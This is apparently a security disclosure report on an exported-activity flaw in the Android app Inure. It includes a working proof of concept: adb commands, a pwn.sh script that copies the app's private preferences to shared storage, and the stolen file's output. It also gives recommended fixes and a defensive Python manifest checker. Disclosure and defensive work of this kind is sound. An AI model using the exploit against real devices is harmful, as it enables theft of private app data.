Theft of Arbitrary Files due to execution of attacker scripts from BashAssociation.kt in hamza417/inure
Reported on Aug 13th 2023
Description
Tested on Build87 of the Inure application. It was discovered that the application had an exported activity (app.simple.inure.activities.association.BashAssociation) which accepted intent data via the file scheme and the text/x-shellscript MIME type, and executed the commands contained within those opened files via RunScript.java.
Since this activity is exported, it is possible for an installed malicious application to send an intent to this activity in order to execute malicious commands. In this particular case, it was possible to retrieve files from the vulnerable application's internal directory (/data/data/app.simple.inure/) and exfiltrate them to /sdcard, where the attacker could read the retrieved information.
Proof of Concept
- Set up a directory on the sdcard:
PS C:\Users\Acer> adb shell
angelica:/ $ cd /sdcard
angelica:/sdcard $ mkdir inure-proof-of-concept
angelica:/sdcard $ cd inure-proof-of-concept/
angelica:/sdcard $ echo "cp /data/data/app.simple.inure/shared_prefs/Preferences.xml /sdcard/inure-proof-of-concept/inure-exfiltrated.xml" > pwn.sh
angelica:/sdcard/inure-proof-of-concept $ ls -la
total 10
drwxrwx--x 2 root sdcard_rw 3488 2023-08-13 13:32 .
drwxrwx--x 51 root sdcard_rw 3488 2023-08-13 13:31 ..
-rw-rw---- 1 root sdcard_rw 113 2023-08-13 13:32 pwn.sh
- Perform the attack via an adb command:
PS C:\Users\Acer\Desktop\pwn-toolkit\apks\app.simple.inure> adb shell am start -a android.intent.action.VIEW -d "file:///sdcard/inure-proof-of-concept/pwn.sh" -n app.simple.inure/.activities.association.BashAssociation
Starting: Intent { act=android.intent.action.VIEW dat=file:///sdcard/inure-proof-of-concept/pwn.sh cmp=app.simple.inure/.activities.association.BashAssociation }
- Review the files in the directory we created in step 1; we can see that the Preferences.xml file was exfiltrated:
angelica:/sdcard/inure-proof-of-concept $ ls -la
total 14
drwxrwx--x 2 root sdcard_rw 3488 2023-08-13 13:34 .
drwxrwx--x 51 root sdcard_rw 3488 2023-08-13 13:31 ..
-rw-rw---- 1 root sdcard_rw 1119 2023-08-13 13:34 inure-exfiltrated.xml
-rw-rw---- 1 root sdcard_rw 113 2023-08-13 13:32 pwn.sh
angelica:/sdcard/inure-proof-of-concept $ cat inure-exfiltrated.xml
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
<boolean name="apk_external_storage" value="false" />
<boolean name="is_external_storage" value="false" />
<int name="app_accent_color" value="-29592" />
<int name="main_app_launch_count" value="5" />
<boolean name="is_custom_color" value="false" />
<int name="view_positions" value="7" />
<boolean name="disclaimer_agreed" value="true" />
<string name="last_search_keyword"></string>
<string name="crashCause">android.system.ErrnoException: open failed: ENOENT (No such file or directory)</string>
<string name="home_path">/data/user/0/app.simple.inure/app_HOME</string>
<string name="crash_message">java.lang.RuntimeException: Unable to start activity ComponentInfo{app.simple.inure/app
.simple.inure.activities.association.BashAssociation}: java.io.FileNotFoundException: /sdcard/inure-proof-of-concept/inu
re-root-id-test.sh: open failed: ENOENT (No such file or directory)</string>
<long name="crash_timestamp" value="1691896905717" />
<boolean name="deep_search_keyword_mode" value="false" />
</map>
Impact
An application's internal directory and the files within it should never be accessible by other applications on the device. The vulnerability reported demonstrates that it is possible for malicious third-party applications to steal data belonging to the Inure app's private directory through the execution of malicious bash scripts. A recommended fix would be to set the exported attribute of the activity to false, or to apply the inure.terminal.permission.RUN_SCRIPT permission on the affected functionality.
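Either recommended fix can be verified mechanically. The Python check below is an added example, not code from the Inure project: it scans a decoded AndroidManifest.xml for activities that are exported without a permission. The manifest is constructed for illustration, and the two `.example.*` activities are hypothetical.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # android: attribute namespace

# Constructed manifest for illustration; only the first activity name and the
# permission name come from the report. The other two entries are hypothetical.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="app.simple.inure">
  <application>
    <activity android:name=".activities.association.BashAssociation"
              android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.VIEW" />
        <data android:scheme="file" android:mimeType="text/x-shellscript" />
      </intent-filter>
    </activity>
    <activity android:name=".example.FixedByNotExporting"
              android:exported="false" />
    <activity android:name=".example.FixedByPermission"
              android:exported="true"
              android:permission="inure.terminal.permission.RUN_SCRIPT" />
  </application>
</manifest>
"""

def unguarded_exported_activities(manifest_xml):
    """Names of activities any installed app can start without a permission."""
    root = ET.fromstring(manifest_xml)
    app = root.find("application")
    app_permission = app.get(A + "permission")  # default for all components
    findings = []
    for activity in app.iter("activity"):
        exported = activity.get(A + "exported")
        has_filter = activity.find("intent-filter") is not None
        # With no explicit attribute, an intent-filter makes the activity
        # exported on apps targeting below Android 12.
        is_exported = exported == "true" or (exported is None and has_filter)
        permission = activity.get(A + "permission") or app_permission
        if is_exported and not permission:
            findings.append(activity.get(A + "name"))
    return findings

if __name__ == "__main__":
    for name in unguarded_exported_activities(SAMPLE_MANIFEST):
        print("exported without permission:", name)
```

A permission only restricts callers if other apps cannot freely obtain it, so the protectionLevel of its declaration is worth reviewing alongside this check.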